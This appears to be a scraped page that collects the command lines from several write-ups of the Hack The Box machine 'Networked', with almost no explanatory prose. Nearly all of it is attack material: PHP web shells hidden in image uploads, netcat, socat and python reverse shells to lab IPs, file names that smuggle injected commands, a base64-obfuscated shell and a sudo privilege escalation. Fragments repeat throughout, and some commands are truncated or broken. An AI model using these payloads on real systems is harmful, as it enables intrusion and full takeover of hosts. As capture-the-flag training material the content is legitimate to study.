networked.htbwriteup.com
Open in
urlscan Pro
54.84.236.175
Public Scan
URL:
https://networked.htbwriteup.com/
Submission: On January 26 via api from US — Scanned from US
Submission: On January 26 via api from US — Scanned from US
Form analysis 0 forms found in the DOM
Text Content
NETWORKED WRITEUP & WALKTHROUGH
For now this is a list commands by various authors.
0xdf [writeup]
2953,067
Omniscient
nmap -p- --min-rate 10000 -oA scans/nmap-alltcp 10.10.10.146
nmap -p 80,22,443 -sV -sC -oA scans/nmap-tcpscripts 10.10.10.146
tar xvf backup.tar
tar xvf backup.tar
26 if (substr_compare($myFile["name"], $vext, -strlen($vext)) === 0) {
php -a
php > $filename="image.png";
php > $pieces = explode('.',$filename); print_r($pieces);
php > $name= array_shift($pieces); echo $name;
php > $name = str_replace('_','.',$name); echo $name;
php > $ext = implode('.',$pieces); echo $ext;
php > $filename="image.php.png";
php > $pieces = explode('.',$filename); print_r($pieces);
php > $name= array_shift($pieces); echo $name;
php > $name = str_replace('_','.',$name); echo $name;
php > $ext = implode('.',$pieces); echo $ext;
file shell.png
nc -lnvp 443
bash-4.2$ ls -l
php /home/guly/check_attack.php
if ($value == 'index.html') {
if (!($check[0])) {
echo "attack!\n";
exec("rm -f $logpath");
exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
echo "rm -f $path$value\n";
exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
ls -a
php > $files = preg_grep('/^([^.])/', scandir('.')); print_r($files);
nc -e sh 10.10.14.7 443
bash-4.2$ nc -e sh 10.10.14.7 443
nc -lnvp 443
echo nc -e /bin/bash 10.10.14.7 443 | base64 -w0
bash-4.2$ echo bmMgLWUgL2Jpbi9iYXNoIDEwLjEwLjE0LjcgNDQzCg== | base64 -d | sh
nc -lnvp 443
bash-4.2$ touch '/var/www/html/uploads/a; echo bmMgLWUgL2Jpbi9iYXNoIDEwLjEwLjE0LjcgNDQzCg== | base64 -d | sh; b'
a; echo bmMgLWUgL2Jpbi9iYXNoIDEwLjEwLjE0LjcgNDQzCg== | base64 -d | sh; b
a; echo bmMgLWUgL2Jpbi9iYXNoIDEwLjEwLjE0LjcgNDQzCg== | base64 -d | sh; b
exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
exec("nohup /bin/rm -f /var/www/html/uploads/a; echo bmMgLWUgL2Jpbi9iYXNoIDEwLjEwLjE0LjcgNDQzCg== | base64 -d | sh; b > /dev/null 2>&1 &");
nc -lnvp 443
sudo -l
[guly@networked ~]$ sudo -l
sudo -l
!/bin/bash -p
cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF
for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do
echo "interface $var:"
read x
while [[ ! $x =~ $regexp ]]; do
echo "wrong input, try again"
echo "interface $var:"
read x
echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly
sudo /usr/local/sbin/changename.sh
cat /etc/sysconfig/network-scripts/ifcfg-guly
command not found
0xRick [writeup]
89146
Omniscient
root@kali:~/Desktop/HTB/boxes/networked# nmap -sV -sT -sC -o nmapinitial networked.htb
root@kali:~/Desktop/HTB/boxes/networked# gobuster -u http://networked.htb/ -w /usr/share/wordlists/dirb/common.txt
backup.tar 100%[=====================================================================================================================>] 10.00K --.-KB/s in 0.1s
root@kali:~/Desktop/HTB/boxes/networked/backup# ls -la
#echo "name $name - ext $ext\n";
return array($name,$ext);
return array($name,$ext);
//echo "prefix: $prefix - fname: $filename\n";
if (!(filter_var($prefix, FILTER_VALIDATE_IP))) {
return array($ret,$msg);
if (function_exists('finfo_file')) {
if (is_resource($finfo)) // It is possible that a FALSE value is returned, if there is no magic MIME database file found on the system
if (is_string($mime) && preg_match($regexp, $mime, $matches)) {
return $file_type;
if (function_exists('mime_content_type'))
if (strlen($file_type) > 0) // It's possible that mime_content_type() returns FALSE or an empty string
return $file_type;
return $file['type'];
if (strpos($mime_type, 'image/') === 0) {
return true;
return false;
echo '
'."\n";
if (in_array($file, $ignored)) continue;
if (!($check[0])) {
if ((strpos($exploded[0], '10_10_') === 0) && (!($prefix === $_SERVER["REMOTE_ADDR"])) ) {
if ($i == 1) {
echo "\n";
echo '\n";
if ($i == 4) {
echo "\n";
if ($i < 4 && $i > 1) {
echo "\n";
if (!empty($_FILES["myFile"])) {
if (!(check_file_type($_FILES["myFile"]) && filesize($_FILES['myFile']['tmp_name']) < 60000)) {
echo '
Invalid image file.';
if ($myFile["error"] !== UPLOAD_ERR_OK) {
echo "
An error occurred.";
if (substr_compare($myFile["name"], $vext, -strlen($vext)) === 0) {
if (!($valid)) {
echo "
Invalid image file";
if (!$success) {
echo "
Unable to save file.";
echo "
file uploaded, refresh gallery";
root@kali:~/Desktop/HTB/boxes/networked# echo 'passthru("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.xx.xx 1337 >/tmp/f");' >> ./shell.php.png
root@kali:~/Desktop/HTB/boxes/networked# nc -lvnp 1337
which python
sh-4.2$ python -c "import pty;pty.spawn('/bin/bash')"
python -c "import pty;pty.spawn('/bin/bash')"
root@kali:~/Desktop/HTB/boxes/networked# stty raw -echo
root@kali:~/Desktop/HTB/boxes/networked# nc -lvnp 1337
bash-4.2$ ls -al
bash-4.2$ ls -al
if ($value == 'index.html') {
if (!($check[0])) {
echo "attack!\n";
exec("rm -f $logpath");
exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
echo "rm -f $path$value\n";
exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
bash-4.2$ touch '; nc 10.10.xx.xx 1338 -c bash'
root@kali:~/Desktop/HTB/boxes/networked# nc -lvnp 1338
python -c "import pty;pty.spawn('/bin/bash')"
root@kali:~/Desktop/HTB/boxes/networked# stty raw -echo
root@kali:~/Desktop/HTB/boxes/networked# nc -lvnp 1338
[guly@networked ~]$ ls -al
sudo -l
[guly@networked ~]$ sudo -l
!/bin/bash -p
cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF
for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do
echo "interface $var:"
read x
while [[ ! $x =~ $regexp ]]; do
echo "wrong input, try again"
echo "interface $var:"
read x
echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly
test bash
[root@networked ~]# ls -la
jirbj [writeup]
14521
Guru
nmap -sV -p- -T4 10.10.10.146
tar xvf backup.tar
cat upload.php
if (!empty($_FILES["myFile"])) {
if (!(check_file_type($_FILES["myFile"]) && filesize($_FILES['myFile']['tmp_name']) < 60000)) {
echo '
Invalid image file.';
if ($myFile["error"] !== UPLOAD_ERR_OK) {
echo "
An error occurred.";
if (substr_compare($myFile["name"], $vext, -strlen($vext)) === 0) {
if (!($valid)) {
echo "
Invalid image file";
if (!$success) {
echo "
Unable to save file.";
echo "
file uploaded, refresh gallery";
nc -nlvp 4444
http://10.10.10.146/uploads/10_10_14_5.php.jpg?cmd=nc 10.10.14.5 4444 -e /bin/bash
python -c "import pty;pty.spawn('/bin/bash')"
bash-4.2$ ls -la
bash-4.2$ ls -la
cat crontab.guly
if ($value == 'index.html') {
if (!($check[0])) {
echo "attack!\n";
exec("rm -f $logpath");
exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
echo "rm -f $path$value\n";
nc -nlvp 5555
bash-4.2$ touch "; nc 10.10.14.5 5555 -e bash"
bash-4.2$ ls -la
bash-4.2$ echo "nc 10.10.14.5 5555 -e /bin/bash" > ./shell.sh
python -c "import pty;pty.spawn('/bin/bash')"
[guly@networked ~]$ ls -la
[guly@networked ~]$ sudo -l
!/bin/bash -p
cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF
for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do
echo "interface $var:"
read x
while [[ ! $x =~ $regexp ]]; do
echo "wrong input, try again"
echo "interface $var:"
read x
echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly
sh-4.2# ls -la
luckolen [writeup]
491
Hacker
luc@kali:~/HTB/Networked$ nmap -vv --reason -Pn -A --osscan-guess --version-all -p- 10.10.10.146
luc@kali:~/HTB/Networked$ gobuster dir -u http://10.10.10.146/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp"
if (!empty($_FILES["myFile"])) {
if (!(check_file_type($_FILES["myFile"]) && filesize($_FILES['myFile']['tmp_name']) < 60000)) {
echo '
Invalid image file.';
if ($myFile["error"] !== UPLOAD_ERR_OK) {
echo "
An error occurred.";
if (substr_compare($myFile["name"], $vext, -strlen($vext)) === 0) {
if (!($valid)) {
echo "
Invalid image file";
if (!$success) {
echo "
Unable to save file.";
echo "
file uploaded, refresh gallery";
#echo "name $name - ext $ext\n";
return array($name,$ext);
return array($name,$ext);
//echo "prefix: $prefix - fname: $filename
\n";
if (!(filter_var($prefix, FILTER_VALIDATE_IP))) {
return array($ret,$msg);
if (function_exists('finfo_file')) {
if (is_resource($finfo)) // It is possible that a FALSE value is returned, if there is no magic MIME database file found on the system
if (is_string($mime) && preg_match($regexp, $mime, $matches)) {
return $file_type;
if (function_exists('mime_content_type'))
if (strlen($file_type) > 0) // It's possible that mime_content_type() returns FALSE or an empty string
return $file_type;
return $file['type'];
if (strpos($mime_type, 'image/') === 0) {
return true;
return false;
luc@kali:~/HTB/Networked$ sudo nc -lnvp 443
bash-4.2$ ls -R
if ($value == 'index.html') {
if (!($check[0])) {
echo "attack!\n";
exec("rm -f $logpath");
exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
echo "rm -f $path$value\n";
bash-4.2$ ls -l
exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
bash-4.2$ touch '/var/www/html/uploads/; nc 10.10.14.9 444 -c bash'
10_10_14_9.jpg 10_10_14_9.php.jpg 127_0_0_1.png 127_0_0_2.png 127_0_0_3.png 127_0_0_4.png ; nc 10.10.14.9 444 -c bash index.html
luc@kali:~/HTB/Networked$ sudo nc -lnvp 444
cat /home/guly/user.txt
[guly@networked ~]$ sudo -l
!/bin/bash -p
cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF
for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do
echo "interface $var:"
read x
while [[ ! $x =~ $regexp ]]; do
echo "wrong input, try again"
echo "interface $var:"
read x
echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly
test bash
phaz0n [writeup]
3812
Hacker
nmap -sC -sV 10.10.10.146
gobuster dir -u http://10.10.10.146 -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -x php
if (substr_compare($myFile["name"], $vext, -strlen($vext)) === 0) {
if (!(check_file_type($_FILES["myFile"]) && filesize($_FILES['myFile']['tmp_name']) < 60000)) {
echo '
Invalid image file.';
if (strpos($mime_type, 'image/') === 0) {
return true;
return false;
if (function_exists('finfo_file')) {
if (is_resource($finfo)) // It is possible that a FALSE value is returned, if there is no magic MIME database file found on the system
if (is_string($mime) && preg_match($regexp, $mime, $matches)) {
return $file_type;
nc -nlvp 443
nc -nlvp 443
sh-4.2$ python -c 'import pty;pty.spawn("/bin/bash")'
if ($value == 'index.html') {
if (!($check[0])) {
echo "attack!\n";
exec("rm -f $logpath");
exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
echo "rm -f $path$value\n";
cd /var/www/html/uploads
touch "test.txt"
php /home/guly/check_attack.php
rm -f /var/www/html/uploads/test.txt
exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
bash-4.2$ touch "; nc 10.10.14.27 4444 -e '/bin/bash'"
socat file:`tty`,raw,echo=0 tcp-listen:4444
bash-4.2$ touch "; socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.14.27:4444"
rm -f /var/www/html/uploads/; socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.14.27:4444
socat file:`tty`,raw,echo=0 tcp-listen:4444
socat file:`tty`,raw,echo=0 tcp-listen:4444
sudo -l
[guly@networked /]$ sudo -l
!/bin/bash -p
cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF
for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do
echo "interface $var:"
read x
while [[ ! $x =~ $regexp ]]; do
echo "wrong input, try again"
echo "interface $var:"
read x
echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly
test
ps /tmp/foo
nc -nlvp 3333
[guly@networked ~]$ echo "nc -e /bin/bash 10.10.14.27 3333" > /tmp/foo
ps /tmp/foo
nc -nlvp 3333
padraignix [writeup]
3415
Elite Hacker
cat upload.php
if (!empty($_FILES["myFile"])) {
if (!(check_file_type($_FILES["myFile"]) && filesize($_FILES['myFile']['tmp_name']) < 60000)) {
echo '
Invalid image file1.';
if ($myFile["error"] !== UPLOAD_ERR_OK) {
echo "
An error occurred.";
if (substr_compare($myFile["name"], $vext, -strlen($vext)) === 0) {
if (!($valid)) {
echo "
Invalid image file2";
cat lib.php
if (function_exists('finfo_file')) {
if (is_resource($finfo)) // It is possible that a FALSE value is returned, if there is no magic MIME database file found on the system
if (is_string($mime) && preg_match($regexp, $mime, $matches)) {
return $file_type;
if (function_exists('mime_content_type'))
if (strlen($file_type) > 0) // It's possible that mime_content_type() returns FALSE or an empty string
return $file_type;
return $file['type'];
if (strpos($mime_type, 'image/') === 0) {
return true;
return false;
cat crontab.guly
cat check_attack.php
if ($value == 'index.html') {
if (!($check[0])) {
echo "attack!\n";
exec("rm -f $logpath");
exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
echo "rm -f $path$value\n";
sh-4.2$ touch "no; nc -c bash 10.10.xx.xx 31337"
touch "no; nc -c bash 10.10.xx.xx 31337"
sudo -l
cat /usr/local/sbin/changename.sh
!/bin/bash -p
cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF
for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do
echo "interface $var:"
read x
while [[ ! $x =~ $regexp ]]; do
echo "wrong input, try again"
echo "interface $var:"
read x
echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly
sudo -u root /usr/local/sbin/changename.sh
samirettali [writeup]
458
Pro Hacker
nmap -A -T4 10.10.10.146
gobuster dir -q -t 40 -w raft-large-directories.txt -u http://10.10.10.146
gobuster dir -q -t 40 -w raft-large-files.txt -u http://10.10.10.146
tar -xvf backup.tar
if (!empty($_FILES["myFile"])) {
if (!(check_file_type($_FILES["myFile"]) && filesize($_FILES['myFile']['tmp_name']) < 60000)) {
echo '
Invalid image file.';
if ($myFile["error"] !== UPLOAD_ERR_OK) {
echo "
An error occurred.";
if (substr_compare($myFile["name"], $vext, -strlen($vext)) === 0) {
if (!($valid)) {
echo "
Invalid image file";
if (!$success) {
echo "
Unable to save file.";
echo "
file uploaded, refresh gallery";
#echo "name $name - ext $ext\n";
return array($name,$ext);
return array($name,$ext);
//echo "prefix: $prefix - fname: $filename
\n";
if (!(filter_var($prefix, FILTER_VALIDATE_IP))) {
return array($ret,$msg);
if (function_exists('finfo_file')) {
if (is_resource($finfo)) // It is possible that a FALSE value is returned, if there is no magic MIME database file found on the system
if (is_string($mime) && preg_match($regexp, $mime, $matches)) {
return $file_type;
if (function_exists('mime_content_type'))
if (strlen($file_type) > 0) // It's possible that mime_content_type() returns FALSE or an empty string
return $file_type;
return $file['type'];
if (strpos($mime_type, 'image/') === 0) {
return true;
return false;
exiftool -Comment='' hackthebox.png
nc -lnvp 1337
nohup /bin/rm -f $path; ls > /dev/null 2>&1 &
; nc 10.10.14.1 1338 - bash
touch \;nc\ 10\.10\.14\.4\ 1338\ -c\ bash
nc -nlvp 1338
python -c "import pty; pty.spawn('/bin/bash')"
[guly@networked ~]$ wc -c user.txt
[root@networked network-scripts]# wc -c /root/root.txt
nullarmor [writeup]
1026
Pro Hacker
gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://10.10.10.146 -t 25
if (!empty($_FILES["myFile"])) {
if (!(check_file_type($_FILES["myFile"]) && filesize($_FILES['myFile']['tmp_name']) < 60000)) {
echo '
Invalid image file.';
if ($myFile["error"] !== UPLOAD_ERR_OK) {
echo "
An error occurred.";
if (substr_compare($myFile["name"], $vext, -strlen($vext)) === 0) {
if (!($valid)) {
echo "
Invalid image file";
if (!$success) {
echo "
Unable to save file.";
echo "
file uploaded, refresh gallery";
exiftool -Comment='' shell.php.jpeg
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.22",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
if ($value == 'index.html') {
if (!($check[0])) {
echo "attack!\n";
exec("rm -f $logpath");
exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
echo "rm -f $path$value\n";
command injection
;nc -e \$(which bash) 10.10.14.22 4444
touch ";nc -e \$(which bash) 10.10.14.22 4444"
sudo -l
!/bin/bash -p
cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF
for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do
echo "interface $var:"
read x
while [[ ! $x =~ $regexp ]]; do
echo "wrong input, try again"
echo "interface $var:"
read x
echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly
borari [writeup]
721
Pro Hacker
ssh on tcp/22
wget
tar -xvf backup.tar
$sock, 1=>$sock, 2=>$sock), $pipes); ?>
nc -nvlp 443
ls /home
sh-4.2\$ ls -lAh /home/guly
ls -lAh /home/guly
sh-4.2\$ /usr/bin/script -qc /bin/bash /dev/null
/usr/bin/script -qc /bin/bash /dev/null
bash-4.2\$ curl -s \| bash /dev/stdin -l 1
if ($value == 'index.html') {
if (!($check[0])) {
echo "attack!\n";
exec("rm -f $logpath");
exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
echo "rm -f $path$value\n";
//echo "prefix: $prefix - fname: $filename
\n";
if (!(filter_var($prefix, FILTER_VALIDATE_IP))) {
return array($ret,$msg);
sh-4.2\$ ls -lAh
ls -lAh
sh-4.2\$ touch \-- \'/var/www/html/uploads; nc -c bash 10.10.14.18 445\'
sh-4.2\$ ls -lAh
ls -lAh
nc -nvlp 445
\[guly@networked shm\]\$ sudo -l
curl -s \| bash /dev/stdin -l 1
\[guly@networked \~\]\$ export NAME=\'; nc -c 10.10.14.18 443\'
; nc -c 10.10.14.18 443
guy0 nc -c bash 10.10.14.18 443
nc -c bash 10.10.14.18 443
0x3ashry [writeup]
gobuster dir -u http://10.10.10.146/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o directory.txt 2>/dev/null
tar xvf backup.tar
if (!(check_file_type($_FILES["myFile"]) && filesize($_FILES['myFile']['tmp_name']) < 60000)) {
echo '
Invalid image file.';
if (substr_compare($myFile["name"], $vext, -strlen($vext)) === 0) {
if (!($valid)) {
echo "
Invalid image file";
if ($value == 'index.html') {
if (!($check[0])) {
echo "attack!\n";
exec("rm -f $logpath");
exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
echo "rm -f $path$value\n";
rm -f
touch "; nc -c bash 10.10.16.10 5555"
sudo -l
!/bin/bash -p
cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF
for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do
echo "interface $var:"
read x
while [[ ! $x =~ $regexp ]]; do
echo "wrong input, try again"
echo "interface $var:"
read x
echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly
Hilbert [writeup]
gobuster dir -w -x .php,.txt -o -u http://10.10.10.146
exiftool -DocumentName="';\$cmd = (\$_REQUEST['cmd']);system(\$cmd);echo '';} __halt_compiler();?>" hilbert.jpg
root@kali:~/HTB/Boxes/Networked# nc -nlvp 1234
if ($value == 'index.html') {
if (!($check[0])) {
echo "attack!\n";
exec("rm -f $logpath");
exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
echo "rm -f $path$value\n";
exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
sh-4.2$ touch ";nc 10.10.14.3 1235 -c bash"
root@kali:~/HTB/Boxes/Networked# nc -nlvp 1235
Not affliated with Hack The Box.
';
echo "uploaded by $check[1]";
echo "";
echo "